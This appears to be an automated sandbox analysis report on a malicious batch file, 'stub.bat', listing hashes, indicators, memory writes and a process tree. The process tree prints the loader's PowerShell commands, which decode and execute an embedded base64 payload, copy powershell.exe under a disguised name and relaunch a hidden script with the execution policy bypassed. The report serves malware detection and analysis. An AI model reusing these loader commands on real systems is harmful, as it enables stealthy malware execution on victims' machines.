cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1

Resubmissions

08-07-2024 15:19

240708-sqj4jaxflf 10

08-07-2024 13:40

240708-qyw2ys1gll 8

Analysis

max time kernel
300s
max time network
207s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
08-07-2024 13:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

stub.bat
Size

3.4MB
MD5

c27b8c9f05c86817d8d287f0d0bd8698
SHA1

239748a1871a85c7df6733bc24d9497a331aca87
SHA256

cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1
SHA512

fbd18278c1d8c18360f16cf11db634162cb7e14484853496670ca074e06cbd26f5933b9cd22046063da3f86c294c786c20a00545baa8cbdc76a6af61c55c7bca
SSDEEP

49152:/mThC67EFbMUKiKknefnfIlTYhjwHs0j+VqdyvZWs6sT/Pj5wSe/XDX/DlbfZ5+m:n

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 64 IoCs

flow	pid	Process
17	3692	powershell.exe
18	3692	powershell.exe
19	3692	powershell.exe
20	3692	powershell.exe
21	3692	powershell.exe
22	3692	powershell.exe
23	3692	powershell.exe
25	3692	powershell.exe
26	3692	powershell.exe
27	3692	powershell.exe
28	3692	powershell.exe
29	3692	powershell.exe
30	3692	powershell.exe
31	3692	powershell.exe
32	3692	powershell.exe
33	3692	powershell.exe
34	3692	powershell.exe
35	3692	powershell.exe
36	3692	powershell.exe
37	3692	powershell.exe
38	3692	powershell.exe
39	3692	powershell.exe
40	3692	powershell.exe
41	3692	powershell.exe
42	3692	powershell.exe
43	3692	powershell.exe
44	3692	powershell.exe
45	3692	powershell.exe
46	3692	powershell.exe
47	3692	powershell.exe
48	3692	powershell.exe
49	3692	powershell.exe
50	3692	powershell.exe
51	3692	powershell.exe
52	3692	powershell.exe
53	3692	powershell.exe
54	3692	powershell.exe
55	3692	powershell.exe
56	3692	powershell.exe
57	3692	powershell.exe
58	3692	powershell.exe
59	3692	powershell.exe
60	3692	powershell.exe
61	3692	powershell.exe
62	3692	powershell.exe
63	3692	powershell.exe
64	3692	powershell.exe
65	3692	powershell.exe
66	3692	powershell.exe
67	3692	powershell.exe
68	3692	powershell.exe
69	3692	powershell.exe
70	3692	powershell.exe
71	3692	powershell.exe
72	3692	powershell.exe
73	3692	powershell.exe
74	3692	powershell.exe
75	3692	powershell.exe
76	3692	powershell.exe
77	3692	powershell.exe
78	3692	powershell.exe
79	3692	powershell.exe
80	3692	powershell.exe
81	3692	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2988	$ktm-powershell.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx	svchost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3692	powershell.exe

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720446155"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
640	Process not Found
4388	Process not Found
1004	Process not Found
1812	Process not Found
4816	Process not Found
1076	Process not Found
3428	Process not Found
2312	Process not Found
3604	Process not Found
820	Process not Found
2512	Process not Found
2292	Process not Found
824	Process not Found
2204	Process not Found
764	Process not Found
4796	Process not Found
3240	Process not Found
1816	Process not Found
392	Process not Found
936	Process not Found
1096	Process not Found
1204	Process not Found
1168	Process not Found
2256	Process not Found
4008	Process not Found
1008	Process not Found
1208	Process not Found
1352	Process not Found
1256	Process not Found
4092	Process not Found
684	Process not Found
3644	Process not Found
4904	Process not Found
4676	Process not Found
4872	Process not Found
4756	Process not Found
3888	Process not Found
4520	Process not Found
4552	Process not Found
2024	Process not Found
1232	Process not Found
3764	Process not Found
232	Process not Found
1396	Process not Found
3840	Process not Found
1140	Process not Found
3132	Process not Found
2348	Process not Found
1784	Process not Found
1624	Process not Found
3308	Process not Found
4236	Process not Found
3136	Process not Found
3140	Process not Found
1052	Process not Found
2556	Process not Found
4948	Process not Found
448	Process not Found
1900	Process not Found
4040	Process not Found
2660	Process not Found
4592	Process not Found
4988	Process not Found
3452	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeShutdownPrivilege	3516	Explorer.EXE
Token: SeCreatePagefilePrivilege	3516	Explorer.EXE
Token: SeShutdownPrivilege	3516	Explorer.EXE
Token: SeCreatePagefilePrivilege	3516	Explorer.EXE
Token: SeShutdownPrivilege	3516	Explorer.EXE
Token: SeCreatePagefilePrivilege	3516	Explorer.EXE
Token: SeShutdownPrivilege	3516	Explorer.EXE
Token: SeCreatePagefilePrivilege	3516	Explorer.EXE
Token: SeShutdownPrivilege	3516	Explorer.EXE
Token: SeCreatePagefilePrivilege	3516	Explorer.EXE
Token: SeShutdownPrivilege	3516	Explorer.EXE
Token: SeCreatePagefilePrivilege	3516	Explorer.EXE
Token: SeShutdownPrivilege	3516	Explorer.EXE
Token: SeCreatePagefilePrivilege	3516	Explorer.EXE
Token: SeShutdownPrivilege	3516	Explorer.EXE
Token: SeCreatePagefilePrivilege	3516	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2152	svchost.exe
Token: SeIncreaseQuotaPrivilege	2152	svchost.exe
Token: SeSecurityPrivilege	2152	svchost.exe
Token: SeTakeOwnershipPrivilege	2152	svchost.exe
Token: SeLoadDriverPrivilege	2152	svchost.exe
Token: SeSystemtimePrivilege	2152	svchost.exe
Token: SeBackupPrivilege	2152	svchost.exe
Token: SeRestorePrivilege	2152	svchost.exe
Token: SeShutdownPrivilege	2152	svchost.exe
Token: SeSystemEnvironmentPrivilege	2152	svchost.exe
Token: SeUndockPrivilege	2152	svchost.exe
Token: SeManageVolumePrivilege	2152	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2152	svchost.exe
Token: SeIncreaseQuotaPrivilege	2152	svchost.exe
Token: SeSecurityPrivilege	2152	svchost.exe
Token: SeTakeOwnershipPrivilege	2152	svchost.exe
Token: SeLoadDriverPrivilege	2152	svchost.exe
Token: SeSystemtimePrivilege	2152	svchost.exe
Token: SeBackupPrivilege	2152	svchost.exe
Token: SeRestorePrivilege	2152	svchost.exe
Token: SeShutdownPrivilege	2152	svchost.exe
Token: SeSystemEnvironmentPrivilege	2152	svchost.exe
Token: SeUndockPrivilege	2152	svchost.exe
Token: SeManageVolumePrivilege	2152	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2152	svchost.exe
Token: SeIncreaseQuotaPrivilege	2152	svchost.exe
Token: SeSecurityPrivilege	2152	svchost.exe
Token: SeTakeOwnershipPrivilege	2152	svchost.exe
Token: SeLoadDriverPrivilege	2152	svchost.exe
Token: SeSystemtimePrivilege	2152	svchost.exe
Token: SeBackupPrivilege	2152	svchost.exe
Token: SeRestorePrivilege	2152	svchost.exe
Token: SeShutdownPrivilege	2152	svchost.exe
Token: SeSystemEnvironmentPrivilege	2152	svchost.exe
Token: SeUndockPrivilege	2152	svchost.exe
Token: SeManageVolumePrivilege	2152	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2152	svchost.exe
Token: SeIncreaseQuotaPrivilege	2152	svchost.exe
Token: SeSecurityPrivilege	2152	svchost.exe
Token: SeTakeOwnershipPrivilege	2152	svchost.exe
Token: SeLoadDriverPrivilege	2152	svchost.exe
Token: SeSystemtimePrivilege	2152	svchost.exe
Token: SeBackupPrivilege	2152	svchost.exe
Token: SeRestorePrivilege	2152	svchost.exe
Token: SeShutdownPrivilege	2152	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4692 wrote to memory of 3692	4692	cmd.exe	83
PID 4692 wrote to memory of 3692	4692	cmd.exe	83
PID 3692 wrote to memory of 616	3692	powershell.exe	5
PID 3692 wrote to memory of 672	3692	powershell.exe	7
PID 3692 wrote to memory of 940	3692	powershell.exe	12
PID 3692 wrote to memory of 1016	3692	powershell.exe	13
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 3692 wrote to memory of 516	3692	powershell.exe	14
PID 3692 wrote to memory of 1028	3692	powershell.exe	16
PID 3692 wrote to memory of 1080	3692	powershell.exe	17
PID 3692 wrote to memory of 1088	3692	powershell.exe	18
PID 3692 wrote to memory of 1132	3692	powershell.exe	19
PID 3692 wrote to memory of 1192	3692	powershell.exe	20
PID 3692 wrote to memory of 1244	3692	powershell.exe	21
PID 3692 wrote to memory of 1280	3692	powershell.exe	22
PID 3692 wrote to memory of 1332	3692	powershell.exe	23
PID 3692 wrote to memory of 1408	3692	powershell.exe	24
PID 3692 wrote to memory of 1444	3692	powershell.exe	25
PID 3692 wrote to memory of 1592	3692	powershell.exe	26
PID 3692 wrote to memory of 1600	3692	powershell.exe	27
PID 3692 wrote to memory of 1652	3692	powershell.exe	28
PID 3692 wrote to memory of 1712	3692	powershell.exe	29
PID 3692 wrote to memory of 1752	3692	powershell.exe	30
PID 3692 wrote to memory of 1764	3692	powershell.exe	31
PID 3692 wrote to memory of 1844	3692	powershell.exe	32
PID 3692 wrote to memory of 1968	3692	powershell.exe	33
PID 3692 wrote to memory of 1984	3692	powershell.exe	34
PID 3692 wrote to memory of 2032	3692	powershell.exe	35
PID 3692 wrote to memory of 1000	3692	powershell.exe	36
PID 3692 wrote to memory of 2988	3692	powershell.exe	91
PID 3692 wrote to memory of 2988	3692	powershell.exe	91
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 3692 wrote to memory of 2064	3692	powershell.exe	37
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 3692 wrote to memory of 2152	3692	powershell.exe	39
PID 1408 wrote to memory of 4544	1408	svchost.exe	94
PID 1408 wrote to memory of 4544	1408	svchost.exe	94
PID 3692 wrote to memory of 4544	3692	powershell.exe	94
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 3692 wrote to memory of 2212	3692	powershell.exe	40
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 3692 wrote to memory of 2296	3692	powershell.exe	41
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 1408 wrote to memory of 4772	1408	svchost.exe	96
PID 1408 wrote to memory of 4772	1408	svchost.exe	96
PID 3692 wrote to memory of 2420	3692	powershell.exe	42
PID 3692 wrote to memory of 2428	3692	powershell.exe	43
PID 1408 wrote to memory of 2224	1408	svchost.exe	97
PID 1408 wrote to memory of 2224	1408	svchost.exe	97
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 3692 wrote to memory of 2608	3692	powershell.exe	44
PID 3692 wrote to memory of 2620	3692	powershell.exe	45
PID 3692 wrote to memory of 2680	3692	powershell.exe	47
PID 3692 wrote to memory of 2760	3692	powershell.exe	48
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 1408 wrote to memory of 540	1408	svchost.exe	98
PID 1408 wrote to memory of 540	1408	svchost.exe	98
PID 3692 wrote to memory of 2768	3692	powershell.exe	49
PID 1408 wrote to memory of 4468	1408	svchost.exe	99
PID 1408 wrote to memory of 4468	1408	svchost.exe	99
PID 672 wrote to memory of 2680	672	lsass.exe	47
PID 3692 wrote to memory of 2808	3692	powershell.exe	50
PID 3692 wrote to memory of 3016	3692	powershell.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1016

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1132
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
- Suspicious use of WriteProcessMemory
PID:1408
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:4544
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:4772
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2224
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:540
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:4468
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1600

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1000

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2620

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2808

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3472

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3692
  - - C:\Users\Admin\AppData\Local\$ktm-powershell.exe
      "C:\Users\Admin\AppData\Local\$ktm-powershell.exe" -ep bypass -ec JABtAHQAeAAgAD0AIAAiAEcAbABvAGIAYQBsAFwASABqAFgAQgBGADUAWgBPADcAaQBVAGkAdgBoADkAWgBRAE0AYQBtACIAOwAgACQAbQB0AHgATwBiAGoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4ATQB1AHQAZQB4AF0AOgA6AE8AcABlAG4ARQB4AGkAcwB0AGkAbgBnACgAJABtAHQAeAApADsAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApACAAewAgACQAbQB0AHgATwBiAGoALgBXAGEAaQB0AE8AbgBlACgAKQA7ACAAJABtAHQAeABPAGIAagAuAFIAZQBsAGUAYQBzAGUATQB1AHQAZQB4ACgAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAGYAIAAkAHsAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQB9AFwAYAAkAGsAdABtAC0AbABvAGEAZABlAHIALgBwAHMAMQAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7ACAARQB4AGkAdAAgADAAOwAgAH0A
      4⤵
      Executes dropped EXE
      PID:2988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3832

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4020

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3676

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:4336

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3652

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2016

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1148

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1160

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\$ktm-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xema3a21.snk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/516-86-0x000001E2BDEE0000-0x000001E2BDF0C000-memory.dmp

Filesize
176KB

Download
memory/516-751-0x000001E2BDEB0000-0x000001E2BDED6000-memory.dmp

Filesize
152KB

Download
memory/516-100-0x000001E2BDEB0000-0x000001E2BDED6000-memory.dmp

Filesize
152KB

Download
memory/616-40-0x0000018E286F0000-0x0000018E2871C000-memory.dmp

Filesize
176KB

Download
memory/616-41-0x00007FFE6048D000-0x00007FFE6048E000-memory.dmp

Filesize
4KB

Download
memory/616-30-0x0000018E286C0000-0x0000018E286E6000-memory.dmp

Filesize
152KB

Download
memory/616-31-0x0000018E286F0000-0x0000018E2871C000-memory.dmp

Filesize
176KB

Download
memory/616-32-0x0000018E286F0000-0x0000018E2871C000-memory.dmp

Filesize
176KB

Download
memory/616-42-0x00007FFE6048F000-0x00007FFE60490000-memory.dmp

Filesize
4KB

Download
memory/672-53-0x0000021B44B50000-0x0000021B44B7C000-memory.dmp

Filesize
176KB

Download
memory/672-57-0x0000021B44B20000-0x0000021B44B46000-memory.dmp

Filesize
152KB

Download
memory/672-58-0x00007FFE6048D000-0x00007FFE6048E000-memory.dmp

Filesize
4KB

Download
memory/672-45-0x0000021B44B50000-0x0000021B44B7C000-memory.dmp

